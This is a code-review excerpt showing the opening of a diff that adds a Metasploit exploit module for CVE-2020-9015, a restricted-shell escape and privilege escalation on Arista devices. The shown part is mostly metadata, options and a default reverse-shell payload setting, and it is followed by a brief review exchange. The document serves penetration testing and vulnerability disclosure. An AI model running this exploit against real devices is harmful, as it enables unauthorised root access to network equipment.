modules/exploits/unix/ssh/arista_tacplus_shell.rb

```diff
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::SSH
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Arista restricted shell escape (with privesc)',
+        'Description' => %q{
+          This exploit module takes advantage of a poorly configured TACACS+ config,
+          Arista's bash shell and TACACS+ read-only account to privilage escalate.
+          A CVSS v3 base score of 9.8 has been assigned.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Chris Anders'],
+        'References' =>
+        [
+          [ 'CVE', '2020-9015'],
+          [ 'URL', 'http://www.securitybytes.me/posts/cve-2020-9015/'],
+          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9015' ],
+        ],
+        'Arch' => ARCH_X86,
+        'ConnectionType' => 'find',
+        'DefaultTarget' => 0,
+        'DefaultOptions' =>
+        {
+          'Payload' => 'linux/x86/shell_reverse_tcp'
+        },
+        'DisclosureDate' => 'Feb 02 2020',
+        'Platform' => 'linux',
+        'PayloadType' => 'cmd_interact',
+        'Privileged' => true,
+        'Targets' => [ [ 'Universal', {} ] ]
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOST(),
```

Comment:
This usually isn't necessary.

```suggestion
```

If it is necessary for some reason, this is likely an oversight in the ssh mixin library implementation.

Reply:
addressed - Removed